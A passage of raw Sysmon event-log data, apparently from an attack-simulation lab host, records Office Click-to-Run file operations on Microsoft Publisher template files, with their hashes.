Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CALSO11.POCMD5=7AC701274335C21FAF6FAAA32811392F,SHA256=5283FB5CAE8CACB24D8D7B3DE4362B0B63511480CB3E389B123DC1EE1BEDE86D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069531Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.454{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CALNDR98.POCMD5=FDFA13A155C0BBE41FFAE02374C5C6CB,SHA256=B923A037648F2F070261C2B89A93EB3FF8B2922EE3E1316D90DB4DAE1C8AC294,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069530Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CALHM.POCMD5=25D25810FD147C89C35901AB1FFDDA95,SHA256=1A813F21006C825FB2654709193C5BA89482DCB94BBE2485C44FF9755617CB20,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069529Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CALENDAR.XMLMD5=5A05F1F10353AE446F86598AF0312CE4,SHA256=08FBE5D8477E9FEA0672D5DAA90AD61AAE0D436FC6C19EF0827A194B9FE5A6C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069528Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.439{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\CALENDAR.DPVMD5=226EBF650A333DDB6BB1BBA3F23AA1BE,SHA256=F62FA841966333F64D856E322B19DAE3D0123A87C2CC20F262D059634059BC6D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069527Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BZCRD98.POCMD5=493F73A6CFC9BD9291701CAB345E4771,SHA256=2A5CF8CB3AD0DC469C223526838275A4560F742C0BB780809484269548E2D56E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069526Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BZCD98SP.POCMD5=38C81841C20BC36C7EB5475B4964FCB3,SHA256=9B86B4F2380CC17CAC508FF8F862A2BA8623ED4764622F3A2D4C214ACA392037,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069525Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BZCARDHM.POCMD5=12DAD7374136F27539E6FC3C115D83FB,SHA256=418898641762BCD6E0D27700D20E6586C2BAEB5BCE1181C3F6942BC61F02C8E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069524Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BZCARD11.POCMD5=57A9DD6729442CC538A6896A3FA0B0C9,SHA256=3D58FEA89ACCD191BCFFE93C1EC0244CF02ADD19DDE02883A47BC5199CC06591,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069523Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BS53BOXS.POCMD5=A8A1716D563A2643D2E6B9911513422F,SHA256=E0139EF59789B1911CFC661D5921A21346508742B56F269A180E744408D16311,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069522Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BS4BOXES.POCMD5=29DAC17DA15A59F9B5C4377C698A8E4F,SHA256=DDEB3557D4AE097598A939AF7A5770DF37D6F54C07CC5D935A92736DFA0A8FB7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069521Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.408{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BS2BARB.POCMD5=6E2272CE25B8DB72C3F820E837623734,SHA256=E4707A592692891A1296E3F01533D5A5148180958CFEC866DAE09FBEA8197B0A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069520Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BROCHURE.XMLMD5=20A07174C0656486D3AC4ACC2BA54E08,SHA256=F878F197496253F440606055681D3A4C34607F5641AB0F788E058CBF02BFA8C1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069519Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BROCHURE.DPVMD5=12D6134B89BA1BF88ACABEF254F304AC,SHA256=A90CDBC2665F899F593EA433284CA5521F4DF13E785C74D9997891B8105CC642,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069518Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.392{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BRCHUR98.POCMD5=4EF3B02E901E2DC20F1A665B7B384B85,SHA256=B60E04C7C48189E6744D44604AB5988C9D69856ED6C9EBA391AF40E4D17AB4A9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069517Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.361{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BRCHUR11.POCMD5=9F314D92470337700D3A93EFCCBDD715,SHA256=03CDDF1481C3C0E395003713D5D751681BC458A396D08BEBA1F57D327E7808D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069516Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BRCH98SP.POCMD5=27B605E1C2FBECAF5CF3C2CE80BA591A,SHA256=7DB79E87FF5D50FC292A5DF08276DEFE9570EE67369F82BA3EF981C38F91296C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069515Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BORDERBB.POCMD5=DF2D11F09DA1CE8CDA0398E43E3F59C0,SHA256=D74AC15B7274FF837560D7A5D08E835844EB7C85422A6A86D5828D96971BCA54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069514Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BORDERBB.DPVMD5=24D37E1B9B3AC4007525B3270E2B7D57,SHA256=10668ED34DF9FB38F71510EE3F4905B87AF4F99CFFE6E7B30D74A820162A29F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069513Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.345{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BIZFORM.XMLMD5=D2BFE80BCB7880986A01DED9B705D5F9,SHA256=73BE4FB7DBEB1A649C3E3D76AECEA34F38A085E5574A2C5A4318099B211F5F37,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069512Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.329{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BIZFORM.DPVMD5=958F4B70682EF75332638F610F32090C,SHA256=9DC74AEF494469B0995D770957584D819F476EFA88869C04BA54E99E78B2D062,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069511Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BIZCARD.XMLMD5=BFF2D832CAF15A8BE6AF2C84A527B07C,SHA256=B4C12A69C502D1B2405206C72D90B22A9809F82D35F96B282A6CE4073546EC98,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069510Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.314{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BIZCARD.DPVMD5=4C317AE1F801B5BAACE660FE3A5EEBEB,SHA256=76840C65CBFBED0FC2DB7B6FF7D5CFE195D8C38A58E753DFA4A66FCFCFD90444,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069509Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BDRTKFUL.POCMD5=E14394F26099BB86DFCEEA2AB4E98405,SHA256=DEC7BC0EBF767827C66FA5660B3B6ADD59E281689BA67D264C5C7D45257080CF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069508Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BANNER.XMLMD5=06EFD5B5D66EF5F90CA8DA8041942F5C,SHA256=B94E0A37B00425F43BEEF55A504CDD75B7F2838D13B96BD6FBDA3754A2043D3F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069507Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BANNER.DPVMD5=1F86C50B90A0FD19D4F901E49D09FC2D,SHA256=E37AF49C78C903FB0B4746C32E248230D7E43099495A5096864F4D2455F21C95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069506Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\BAN98.POCMD5=61B40B5476587A2D524D9A479EB143B5,SHA256=7D57E17A837DFEF62E8DAC749719B761BEBB32ABAC4130126C74E6F5A16110F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069505Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\AWARDHM.POCMD5=6ED98A0FC70259C06A4C5085D8B0A703,SHA256=5529B0C586854E05EC111548A1F9122F4D1E91FEB290F8F653E43C373DE3EBA1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069504Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\AIR98.POCMD5=1BB1C75F0586BC8692B6A9DA44D67749,SHA256=3F31203A2D8176EDA1E6435D545BD570F00E57036EB6447475B51190EB27A1CC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069503Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\ADRESPEL.POCMD5=230DDC3E59AD5C6FFDB228EE4079AF18,SHA256=ACC6EBCA8AC4351A3364A8A1F7E4784D2E44CEBB46A79BD93FAD85136886A377,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069502Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\AD98.POCMD5=10DF984EBCBF631577C9B1E9E277E3B2,SHA256=F7B98C183C0C428C84434E39925AC473FE68CF6665B4C2602A43FF7AC7E02A0F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069501Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\AD.XMLMD5=93A0BFC2F97399EA0705393C0F3F4534,SHA256=847703F85C8E2162E7E1A0728C2CB9AB143C7AEB2BC3D6ACC071CB907E17AF92,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069500Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\AD.DPVMD5=652B2C34B901EB5990018FD4D1DCC114,SHA256=0CE7F38F261A3969A33FE50554F3FB640C69A5A694046CF20306BD659C4DE9B4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069499Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.298{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\ACCTBOX.POCMD5=378E44A10B60478231A63AC0BFB67BCF,SHA256=CABAADE80AF9DAED08ADF6CE49C50B5D971D7F383E5BF19A88C746765C3450A5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069498Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBWIZ\ACCSBAR.POCMD5=B7AFD0319FD2DEE8A033F9D0AC48B8DE,SHA256=3C11D3C754E8733EE7973B88F45ABA0A1CF0761812D74897D336B50EA34C2198,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069497Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB9.BDRMD5=CDE0E094D9179BEA653CEC11409D3992,SHA256=EF91A7FD8A954FC502A190BDC0FC1CD8F336A03E1B20366DFC32DA924DDA26E6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069496Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB8.BDRMD5=4FF7AAEAC730FC8995A87E9233C59905,SHA256=18DFCD1B3CC9E6A5D39DFB462652626AE86F6285444BCBAC9F0EC824C15CCF09,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069495Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB7.BDRMD5=D087980A16DDA53FA3BE013D1ECF1AF7,SHA256=60808A2C7ADC2455964982C41D568B336070FFFD1BF60A83B9E50DF9C5FF3E42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069494Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB6.BDRMD5=4877F0AD09F44EE686CF14390BFE21B7,SHA256=8755AED064AFB7919F5AB48A13A268F833A1E132C478AAEB25E68DB3BBA2A3B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069493Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB5B.BDRMD5=765971E076DDA0F75FAA6231F19B0BA5,SHA256=44C31BB35F340E4716626403BB3CB3A6235D7DDFB0C0A7556D4EF0C1347721FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069492Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB5A.BDRMD5=6E2AEAA3E01842C466AD6F41844C2A99,SHA256=A3A6B3CA442726F0B991E2B46F4EBCA234E22608DA428C9439AB3326FBC0AD9D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069491Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB4.BDRMD5=DF375037977C8504706542D07E48DF3F,SHA256=CB2FE6F217E93320791ACA4F4F544756AB16F0E07865A77956DAC13672568648,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069490Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB3B.BDRMD5=5D4BFB16FE733022E2982F118F3B4163,SHA256=0C6ED134B4A32BEB698BD25B2249ABBF9707AC177DE69EA191AA4520F05276E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069489Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.283{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB3A.BDRMD5=58BBA4FBFADCDACD28707904D2341C4B,SHA256=A44287EF7D18CB5CB5719DD2A131074EF9B20EFE4BEAD11361E9C118D8D2D67A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069488Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\PUBBA\MSPUB2B.BDRMD5=592CF41B7157A0352F85C6CD39319CE2,SHA256=F68E8141BFBAEACE5FB9B995780AE5CB0838AA3841785D860C621A45764C3674,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069487Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:24.267{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program 